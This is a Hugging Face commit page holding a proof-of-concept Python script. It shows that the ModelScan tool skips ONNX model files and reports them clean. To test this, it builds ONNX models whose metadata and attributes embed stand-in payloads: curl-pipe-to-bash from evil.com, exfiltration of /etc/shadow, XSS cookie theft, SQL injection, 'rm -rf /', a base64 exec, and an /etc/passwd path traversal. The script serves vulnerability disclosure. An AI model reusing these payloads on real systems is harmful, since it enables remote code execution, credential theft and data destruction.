Rammadaeus
/

onnx-modelscan-gap-poc

ONNX

Model card Files Files and versions

xet

Community

Rammadaeus commited on Feb 16

Commit

0b6c068

verified ·

1 Parent(s): d425d32

Upload poc_modelscan_onnx_gap.py with huggingface_hub

Browse files

Files changed (1) hide show

poc_modelscan_onnx_gap.py +321 -0

poc_modelscan_onnx_gap.py ADDED Viewed

	@@ -0,0 +1,321 @@

+#!/usr/bin/env python3
+"""
+ModelScan ONNX Scanning Gap PoC
+VULNERABILITY:
+  ModelScan (by ProtectAI) claims to scan ML model files for security issues.
+  However, it completely SKIPS all ONNX model files. When pointed at an ONNX
+  file, ModelScan reports "No issues found!" while simultaneously noting in
+  fine print that the file was "skipped" and "not scanned."
+  This means any ONNX model -- regardless of how malicious -- passes ModelScan
+  with a clean bill of health.
+IMPACT:
+  - ONNX models can contain custom operator implementations that reference
+    attacker-controlled shared libraries (.so/.dll)
+  - ONNX models can reference external data files via relative paths,
+    enabling path traversal attacks (e.g. ../../../etc/passwd)
+  - ONNX models can embed arbitrary strings in metadata and operator attributes
+    (shell commands, Python code, injection payloads)
+  - ONNX Runtime custom ops can execute arbitrary native code at inference time
+  - ModelScan reports ALL of these as clean, giving false confidence
+  - Users who rely on ModelScan to vet ONNX files before loading them get
+    zero protection
+AFFECTED:
+  - modelscan 0.8.7 (latest as of 2026-02-16)
+  - All ONNX model files are completely unscanned
+TESTED: modelscan 0.8.7, onnx 1.20.1, Python 3.12
+Usage:
+  python3 poc_modelscan_onnx_gap.py
+"""
+import os
+import sys
+import subprocess
+try:
+    import onnx
+    from onnx import TensorProto, helper
+    HAS_ONNX = True
+except ImportError:
+    HAS_ONNX = False
+    print("[!] WARNING: onnx package not installed. Install with: pip install onnx")
+    sys.exit(1)
+# Use the correct modelscan path
+MODELSCAN_BIN = os.path.expanduser("~/.local/bin/modelscan")
+if not os.path.exists(MODELSCAN_BIN):
+    # Try system PATH
+    import shutil
+    MODELSCAN_BIN = shutil.which("modelscan") or "modelscan"
+def create_simple_onnx_model(output_path):
+    """Create a simple, legitimate ONNX model (baseline)."""
+    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
+    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
+    identity_node = helper.make_node("Identity", inputs=["X"], outputs=["Y"])
+    graph = helper.make_graph([identity_node], "simple_graph", [X], [Y])
+    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
+    model.doc_string = "A simple identity model"
+    onnx.save(model, output_path)
+    print("    Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
+def create_suspicious_custom_op_model(output_path):
+    """
+    Create an ONNX model with a custom operator from an attacker domain.
+    Custom ops require loading external shared libraries at runtime.
+    The operator attribute contains an explicit shell command string.
+    """
+    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
+    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
+    custom_node = helper.make_node(
+        "MaliciousTransform",
+        inputs=["X"],
+        outputs=["Y"],
+        domain="com.attacker.evil_ops",
+        name="evil_custom_op",
+    )
+    custom_node.attribute.append(
+        helper.make_attribute("shell_cmd", "curl http://evil.com/payload | bash")
+    )
+    graph = helper.make_graph([custom_node], "custom_op_graph", [X], [Y])
+    model = helper.make_model(
+        graph,
+        opset_imports=[
+            helper.make_opsetid("", 13),
+            helper.make_opsetid("com.attacker.evil_ops", 1),
+        ],
+    )
+    model.doc_string = "Model with custom operator that could load malicious shared library"
+    entry = model.metadata_props.add()
+    entry.key = "loader_script"
+    entry.value = "import os; os.system('curl http://evil.com/shell.sh | bash')"
+    onnx.save(model, output_path)
+    print("    Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
+def create_external_data_traversal_model(output_path):
+    """
+    Create an ONNX model that references external data via path traversal.
+    The model's weight tensor points to ../../../etc/passwd as its data source.
+    """
+    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
+    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
+    weight_tensor = helper.make_tensor(
+        "weights", TensorProto.FLOAT, [5, 5],
+        [float(i) for i in range(25)]
+    )
+    matmul_node = helper.make_node("MatMul", inputs=["X", "weights"], outputs=["Y"])
+    graph = helper.make_graph(
+        [matmul_node], "external_data_graph", [X], [Y],
+        initializer=[weight_tensor],
+    )
+    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
+    for init in model.graph.initializer:
+        if init.name == "weights":
+            init.data_location = TensorProto.EXTERNAL
+            ext_info = init.external_data.add()
+            ext_info.key = "location"
+            ext_info.value = "../../../etc/passwd"
+            ext_info2 = init.external_data.add()
+            ext_info2.key = "offset"
+            ext_info2.value = "0"
+            ext_info3 = init.external_data.add()
+            ext_info3.key = "length"
+            ext_info3.value = "100"
+            init.ClearField("float_data")
+            init.ClearField("raw_data")
+            break
+    onnx.save(model, output_path)
+    print("    Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
+def create_metadata_injection_model(output_path):
+    """
+    Create an ONNX model with code injection payloads in metadata fields.
+    Includes XSS, SQL injection, Python RCE, and base64-encoded exec.
+    """
+    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 5])
+    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 5])
+    node = helper.make_node("Identity", inputs=["X"], outputs=["Y"])
+    graph = helper.make_graph([node], "metadata_graph", [X], [Y])
+    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 13)])
+    payloads = {
+        "description": "<script>fetch('http://evil.com/steal?cookie='+document.cookie)</script>",
+        "author": "'; DROP TABLE models; --",
+        "license": "__import__('os').system('rm -rf /')",
+        "post_load_hook": "import subprocess; subprocess.run(['curl', 'http://evil.com/exfil', '-d', '@/etc/shadow'])",
+    }
+    for key, value in payloads.items():
+        entry = model.metadata_props.add()
+        entry.key = key
+        entry.value = value
+    model.doc_string = "eval(__import__('base64').b64decode('aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2lkJyk='))"
+    onnx.save(model, output_path)
+    print("    Created: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
+def run_modelscan(model_path, label):
+    """Run modelscan CLI on a model file and return parsed results."""
+    print("\n  --- ModelScan on: {} ---".format(label))
+    try:
+        env = os.environ.copy()
+        env["PATH"] = os.path.expanduser("~/.local/bin") + ":" + env.get("PATH", "")
+        result = subprocess.run(
+            [MODELSCAN_BIN, "scan", "-p", model_path, "--show-skipped"],
+            capture_output=True, text=True, timeout=60, env=env,
+        )
+        output = result.stdout + result.stderr
+        # Filter out TF/CUDA noise
+        lines = []
+        for line in output.split("\n"):
+            if any(skip in line for skip in [
+                "cuda", "CUDA", "TensorFlow binary", "To enable",
+                "settings file detected", "cpu_feature_guard",
+            ]):
+                continue
+            lines.append(line)
+        clean_output = "\n".join(lines).strip()
+        # Print the key parts
+        for line in clean_output.split("\n"):
+            stripped = line.strip()
+            if stripped:
+                print("    | {}".format(stripped))
+        # Parse results
+        skipped = "skipped" in output.lower() and "did not scan" in output.lower()
+        no_issues = "No issues found" in output
+        issues_count = 0
+        if "Total Issues:" in output:
+            for line in output.split("\n"):
+                if "Total Issues:" in line:
+                    try:
+                        issues_count = int(line.split(":")[-1].strip())
+                    except ValueError:
+                        pass
+        return {
+            "scanned": not skipped,
+            "issues_found": issues_count,
+            "no_issues_reported": no_issues,
+            "skipped": skipped,
+        }
+    except FileNotFoundError:
+        print("    ERROR: modelscan binary not found at {}".format(MODELSCAN_BIN))
+        return {"scanned": False, "issues_found": 0, "no_issues_reported": False, "skipped": True}
+    except subprocess.TimeoutExpired:
+        print("    ERROR: Timed out")
+        return {"scanned": False, "issues_found": 0, "no_issues_reported": False, "skipped": True}
+def main():
+    print("=" * 70)
+    print("ModelScan ONNX Scanning Gap PoC")
+    print("=" * 70)
+    print()
+    print("modelscan binary: {}".format(MODELSCAN_BIN))
+    script_dir = os.path.dirname(os.path.abspath(__file__))
+    models_dir = os.path.join(script_dir, "models")
+    os.makedirs(models_dir, exist_ok=True)
+    # Create test models
+    models = []
+    print("\n[*] Creating test ONNX models...")
+    print("\n  1. Simple legitimate model (baseline):")
+    p = os.path.join(models_dir, "simple_identity.onnx")
+    create_simple_onnx_model(p)
+    models.append(("simple_identity.onnx (clean baseline)", p))
+    print("\n  2. Custom operator with shell command attribute:")
+    p = os.path.join(models_dir, "custom_op_suspicious.onnx")
+    create_suspicious_custom_op_model(p)
+    models.append(("custom_op_suspicious.onnx (shell_cmd in attacker domain)", p))
+    print("\n  3. External data with path traversal:")
+    p = os.path.join(models_dir, "external_data_traversal.onnx")
+    create_external_data_traversal_model(p)
+    models.append(("external_data_traversal.onnx (../../../etc/passwd)", p))
+    print("\n  4. Metadata injection payloads:")
+    p = os.path.join(models_dir, "metadata_injection.onnx")
+    create_metadata_injection_model(p)
+    models.append(("metadata_injection.onnx (XSS + SQLi + RCE + b64 exec)", p))
+    # Scan each model
+    print("\n" + "=" * 70)
+    print("[*] Running ModelScan on each model...")
+    results = []
+    for label, path in models:
+        r = run_modelscan(path, label)
+        results.append((label, r))
+    # Summary
+    print("\n" + "=" * 70)
+    print("RESULTS SUMMARY:")
+    print("-" * 70)
+    all_skipped = True
+    all_no_issues = True
+    for label, r in results:
+        if r["skipped"]:
+            status = "SKIPPED (not scanned) but reported 'No issues found'"
+        elif r["no_issues_reported"]:
+            status = "NO ISSUES FOUND"
+        elif r["issues_found"] > 0:
+            status = "ISSUES FOUND: {}".format(r["issues_found"])
+            all_no_issues = False
+        else:
+            status = "UNKNOWN"
+        if not r["skipped"]:
+            all_skipped = False
+        print("  {} => {}".format(label, status))
+    print()
+    if all_skipped:
+        print("VULNERABILITY CONFIRMED: ModelScan SKIPS all ONNX files entirely.")
+        print("It reports 'No issues found!' while the --show-skipped output reveals")
+        print("'Model Scan did not scan file' for every single ONNX model.")
+        print()
+        print("This means ModelScan provides ZERO security coverage for ONNX models:")
+        print("  - Custom operators from attacker-controlled domains: NOT SCANNED")
+        print("  - Shell command strings in operator attributes: NOT SCANNED")
+        print("  - Path traversal in external data references: NOT SCANNED")
+        print("  - Code injection payloads in metadata: NOT SCANNED")
+        print("  - base64-encoded Python exec in doc_string: NOT SCANNED")
+        print()
+        print("The 'No issues found!' message creates a false sense of security.")
+        print("Users trust ModelScan to protect them from malicious models, but")
+        print("ONNX -- one of the most widely used ML formats -- is completely blind.")
+    elif all_no_issues:
+        print("CONFIRMED: ModelScan reports no issues for all ONNX models.")
+    else:
+        print("ModelScan detected some issues. Review output above.")
+    print("=" * 70)
+if __name__ == "__main__":
+    main()